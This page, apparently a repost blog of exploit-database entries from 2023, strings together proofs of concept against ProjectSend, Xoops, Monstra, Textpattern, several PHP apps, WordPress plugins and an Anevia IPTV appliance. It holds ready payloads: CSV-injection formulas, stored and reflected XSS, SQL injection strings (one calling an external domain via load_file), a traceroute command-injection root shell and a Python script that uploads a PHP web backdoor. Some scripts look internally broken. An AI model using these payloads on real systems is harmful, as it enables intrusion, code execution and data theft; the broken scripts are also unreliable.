Exploit Title: projectSend r1605 - CSV injection
Version: r1605
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
step 3. Set name as =calc|a!z|
step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php )
payload: =calc|a!z|
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863110954
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
Hardware revision 1.0
SoapLive 2.0.3
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: Once the admin establishes a secure shell session, she gets
dropped into a sandboxed environment using the login binary that
allows specific set of commands. One of those commands that can be
exploited to escape the jailed shell is traceroute. A remote attacker
can breakout of the restricted environment and have full root access
to the device.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php
13.04.2023
--
$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
bonding
config
date
dns
enable
ethconfig
exit
exp
firewall
help
hostname
http
igmpq
imp
ipconfig
license
log
mail
passwd
persistent_logs
ping
reboot
reset
route
serial
settings
sslconfig
tcpdump
timezone
traceroute
upgrade
uptime
version
vlanconfig
Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary
Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
[-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
[-z pausemsecs] host [data size]
trace the route ip packets follow going to "host"
Options:
-F Set the don't fragment bit
-I Use ICMP ECHO instead of UDP datagrams
-l Display the ttl value of the returned packet
-d Set SO_DEBUG options to socket
-n Print hop addresses numerically rather than symbolically
-r Bypass the normal routing tables and send directly to a host
-v Verbose output
-m max_ttl Set the max time-to-live (max number of hops)
-p port# Set the base UDP port number used in probes
(default is 33434)
-q nqueries Set the number of probes per ``ttl'' to nqueries
(default is 3)
-s src_addr Use the following IP address as the source address
-t tos Set the type-of-service in probe packets to the following value
(default 0)
-w wait Set the time (in seconds) to wait for a response to a probe
(default 3 sec)
-g Specify a loose source route gateway (8 maximum)
uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x 19 root root 1024 Oct 3 2022 .
drwxr-xr-x 19 root root 1024 Oct 3 2022 ..
drwxr-xr-x 2 root root 1024 Oct 21 2013 bin
drwxrwxrwt 2 root root 40 Oct 3 2022 cores
drwxr-xr-x 13 root root 27648 May 22 00:53 dev
drwxr-xr-x 3 root root 1024 Oct 21 2013 emul
drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc
drwxr-xr-x 3 root root 1024 Oct 3 2022 home
drwxr-xr-x 11 root root 3072 Oct 21 2013 lib
lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib
drwx------ 2 root root 12288 Oct 21 2013 lost+found
drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt
drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions
dr-xr-xr-x 177 root root 0 Oct 3 2022 proc
drwxr-xr-x 4 root root 1024 Oct 21 2013 root
drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin
drwxr-xr-x 12 root root 0 Oct 3 2022 sys
drwxrwxrwt 26 root root 1140 May 22 01:06 tmp
drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr
drwxr-xr-x 14 root root 1024 Oct 21 2013 var
ls /var/www/admin
_img configuration.php log_securemedia.php stream_dump.php
_lang cores_and_logs_management.php login.php stream_services
_lib dataminer_handshake.php logout.php streaming.php
_style dvbt.php logs.php support.php
about.php dvbt_scan.php main.php template
ajax export.php manager.php time.php
alarm.php fileprogress.php network.php toto.ts
alarm_view.php firewall.php pear upload_helper.php
authentication.php get_config power.php uptime.php
bridges.php get_enquiry_pending.php read_settings.php usbloader.php
cam.php get_upgrade_error.php receive_helper.php version.php
channel.php heartbeat.php rescrambling webradio.php
channel_xl_list.php include rescrambling.php webtv
check_state input.php resilience webtv.php
class js resilience.php xmltv.php
common license.php restart_service.php
config_snmp.php log.php set_oem.php
python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x 1 root root 35896 Feb 21 2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding firewall mail timezone
config help passwd traceroute
date hostname persistent_logs upgrade
dbg-serial http ping uptime
dbg-set-oem igmpq route version
dbg-updates-log imp serial vlanconfig
dns ipconfig settings
ethconfig license sslconfig
exp log tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]
Exploit Title: projectSend r1605 - Stored XSS
Application: projectSend
Version: r1605
Bugs: Stored Xss
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
1. Login as admin
2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)
3. Go to new JS (http://localhost/custom-assets-add.php?language=js)
4. Set content as alert("xss"); and set public
5. And Save
6. Go to http://localhost (logout)
payload: alert("xss")
POST /custom-assets-add.php HTTP/1.1
Host: localhost
Content-Length: 171
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/custom-assets-add.php?language=js
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l
Connection: close
csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head
# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-12
# Exploit Author: tmrswrr
# Vendor Homepage: https://xoops.org/
# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10
# Version: 2.5.10
# Tested : https://www.softaculous.com/apps/cms/Xoops
--- Description ---
1) Login admin panel and click Image Manager , choose Add Category :
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
2) Write your payload in the Category Name field and submit:
Payload: <script>alert(1)</script>
3) After click multiupload , when you move the mouse to the payload name, you will see the alert button
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2
# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested : https://www.softaculous.com/softaculous/demos/Monstra
--- Description ---
1) Login admin panel and go to Pages:
https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages
2) Click edit button and write your payload in the Name field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button
https://demos3.softaculous.com/Monstraggybvrnbr4/
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The password parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
was submitted in the password parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain. The application interacted with that domain, indicating that
the injected SQL query was executed. The attacker can dump all
information from the
database of this system, and then he can use it for dangerous and
malicious purposes!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
OR NOT 1404=1404-- Eotr
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
## Time spend:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Groomify v1.0 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
# Demo Site: https://script.bugfinder.net/groomify
# Tested on: Kali Linux
# CVE: N/A
### Vulnerable URL ###
https://localhost/groomify/blog-search?search=payload
### Parameter & Payloads ###
Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)
AND 'rszk'='rszk
# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested : https://release-demo.textpattern.co/
--- Description ---
1) Login admin page , choose Content , Articles section :
https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
2) Write in Excerpt field this payload > "><script>alert(document.cookie)</script>
3) Click My Site will you see alert button
https://release-demo.textpattern.co/index.php?id=2
--- Request ---
POST /textpattern/index.php HTTP/2
Host: release-demo.textpattern.co
Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://release-demo.textpattern.co/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
Content-Length: 4690
Origin: https://release-demo.textpattern.co
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="ID"
2
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="event"
article
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="step"
edit
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Title"
hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_body"
1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Body"
hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_excerpt"
1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Excerpt"
"><script>alert(document.cookie)</script>
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sPosted"
1686684925
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sLastMod"
1686685069
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="AuthorID"
managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="LastModID"
managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Status"
4
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Section"
articles
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="override_form"
article_listing
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="year"
2023
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="month"
06
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="day"
13
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="hour"
19
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="minute"
35
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="second"
25
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_year"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_month"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_day"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_hour"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_minute"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_second"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sExpires"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category1"
hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category2"
hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="url_title"
alert1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="description"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Keywords"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Image"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_1"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_2"
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="save"
Save
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="app_mode"
async
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="_txp_token"
fb6da7f582d0606882462bc4ed72238e
-----------------------------26516646042700398511941284351--
# Exploit Title: The Shop v2.5 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/the-shop/34858541
# Demo Site: https://shop.activeitzone.com
# Tested on: Kali Linux
# CVE: N/A
### Request ###
POST /api/v1/carts/add HTTP/1.1
Content-Type: application/json
Accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
Referer: https://localhost
Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;
the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
Content-Length: 81
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}
### Parameter & Payloads ###
Parameter: JSON qty ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)
THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)
END))","temp_user_id":null}
Type: time-based blind
Title: MySQL > 5.0.12 OR time-based blind (heavy query)
Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR
2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS
C)","temp_user_id":null}
# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
# Google Dork: n/a
# Date: 14/06/2023
# Exploit Author: Ramil Mustafayev
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a
# Vulnerability Description:
#
# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
# Usage: python exploit.py http://example.com
import requests
import sys
def upload_file(url, filename, file_content):
files = {
'sliderpic': (filename, file_content, 'application/octet-stream')
}
data = {
'img_id': '',
'sliderPicSubmit': ''
}
url = url+"/Admin/adminHome.php"
try:
response = requests.post(url, files=files, data=data)
except:
print("[!] Exploit failed!")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python exploit.py <target_url>")
sys.exit(1)
target_url = sys.argv[1]
file_name = "simple-backdoor.php"
file_content = '<?php system($_GET["c"]);?>'
upload_file(target_url, file_name, file_content)
print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")
# Exploit Title: Jobpilot v2.61 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
# Demo Site: https://jobpilot.templatecookie.com
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Parameter: long (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT
(ELT(4894=4894,1))),0x71786b7171)) AND
(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
Fire Contract Counties, California, United
States&category=&price_min=&price_max=&tag=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND
(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
Fire Contract Counties, California, United
States&category=&price_min=&price_max=&tag=
Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
Google Dork: N/A
Date: 18-06-2023
Exploit Author: Harshit Joshi
Vendor Homepage: https://community.broadcom.com/home
Software Link: https://www.broadcom.com/products/identity/siteminder
Version: 12.52
Tested on: Linux, Windows
CVE: CVE-2023-23956
Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221
*Description:*
I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
discovered in the Symantec SiteMinder WebAgent. The vulnerability is
related to the improper handling of user input and has been assigned the
Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
vulnerability is 5.4.
Vulnerability Details:
---------------------
*Impact:*
This vulnerability allows an attacker to execute arbitrary JavaScript code
in the context of the affected application.
*Steps to Reproduce:*
*First:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *SMAGENTNAME *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
*Second:*
1) Visit -
https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "*Change Password*" button,
and the popup will appear.
- The *TARGET *parameter is the source of this vulnerability.
*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr / Hulya Karabag
# Vendor Homepage: https://www.diafancms.com/
# Version: 6.0
# Tested on: https://demo.diafancms.com
Description:
1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
Payload : "><script>alert(document.domain)<%2Fscript>
2) After will you see alert button :
https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0
# Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)
# Date of found: 12/05/2023
# Exploit Author: VIVEK CHOUDHARY @sudovivek
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/
# CVE: CVE-2023-33580
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580
Vulnerability Description -
The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.
Steps to Reproduce -
The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:
1. Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.
2. Click on the "Admin" button to navigate to the admin login page.
3. Login to the Admin account using the default credentials.
- Username: admin
- Password: Test@123
4. Proceed to the Admin Profile page.
5. Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.
6. Click on the "Submit" button.
7. Refresh the page, and the injected payload will be executed.
As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.
# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
# Dork: inurl:/wp-includes/class-wp-query.php
# Date: 2023-06-19
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
# Version: 1.0.0 (REQUIRED)
# Tested on: Windows/Linux
# CVE: CVE-2020-11027
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
# Set the WordPress site URL and the user email address
site_url = 'https://example.com'
user_email = 'user@example.com'
# Get the password reset link from the user email
# You can use any email client or library to retrieve the email
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
with open('password_reset_email.html', 'r') as f:
email = f.read()
soup = BeautifulSoup(email, 'html.parser')
reset_link = soup.find('a', href=True)['href']
print(f'Reset Link: {reset_link}')
# Check if the password reset link expires upon changing the user password
response = requests.get(reset_link)
if response.status_code == 200:
# Get the expiration date from the reset link HTML
soup = BeautifulSoup(response.text, 'html.parser')
expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
print(f'Expiration Date: {expiration_date}')
# Check if the expiration date is less than 24 hours from now
if expiration_date < datetime.now() + timedelta(hours=24):
print('Password reset link expires upon changing the user password.')
else:
print('Password reset link does not expire upon changing the user password.')
else:
print(f'Error fetching reset link: {response.status_code} {response.text}')
exit()
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests
# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"
# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"
# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}
# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)
# Check if the payload was executed by searching for the injected script tag
if "<img src=x onerror=alert(document.domain)>" in response.text:
print("Vulnerability successfully exploited")
else:
print("Vulnerability not exploitable")
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
# Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320
import requests
import hashlib
import time
# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"
# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()
# Set the data payload
payload = {
"wpss_nonce": nonce,
"wpss_setting_1": "value_1",
"wpss_setting_2": "value_2",
# Add additional settings as needed
}
# Set the request headers
headers = {
"User-Agent": user_agent,
"Referer": url,
"Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
# Add additional headers as needed
}
# Send the POST request
response = requests.post(url, data=payload, headers=headers)
# Check the response status code
if response.status_code == 200:
print("Request successful")
else:
print("Request failed")
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297
